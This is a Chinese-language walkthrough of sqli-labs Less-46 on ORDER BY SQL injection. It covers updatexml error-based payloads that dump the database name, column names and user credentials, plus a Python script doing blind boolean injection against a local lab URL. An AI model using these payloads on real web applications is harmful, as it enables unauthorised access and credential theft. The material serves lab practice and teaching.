从本关开始，我们开始学习order by 相关注入的知识。

尝试?sort=1 desc或者asc，显示结果不同，则表明可以注入。（升序or降序排列

sort=1时是第一列Id
sort=2时是第二列 username
sort=3时是第三列 password
当sort=4时报错
相当于使用order by作为判断字段数

利用报错注入

爆库

?sort=1%20and%20updatexml(1,concat(0x7e,(database()),0x7e),1)--+

表

?sort=1%20and%20updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)--+

查看username,password字段下的所有值

?sort=1%20and%20updatexml(1,concat(0x7e,(select%20group_concat(username,password)%20from%20security.users),0x7e),1)--+

python脚本

import requests
from urllib.parse import urlencode
from bs4 import BeautifulSoup
url1="http://127.0.0.1/sqli-labs/Less-46/index.php"
def orderby_inject_database(url1):
    name = ''
    for i in range(1, 100):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "rand(ascii(mid((select database()),%d,1)) > %d)" % (i, mid)
            res = {"sort": payload}
            r = requests.get(url1, params=res)
            # if 'You are in...........' in r.text:
            html = r.text
            soup = BeautifulSoup(html,'html.parser')
            getUsername = soup.find_all('td')[1].text
            if getUsername == "admin3":
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name += chr(mid)
        print(name)
orderby_inject_database(url1)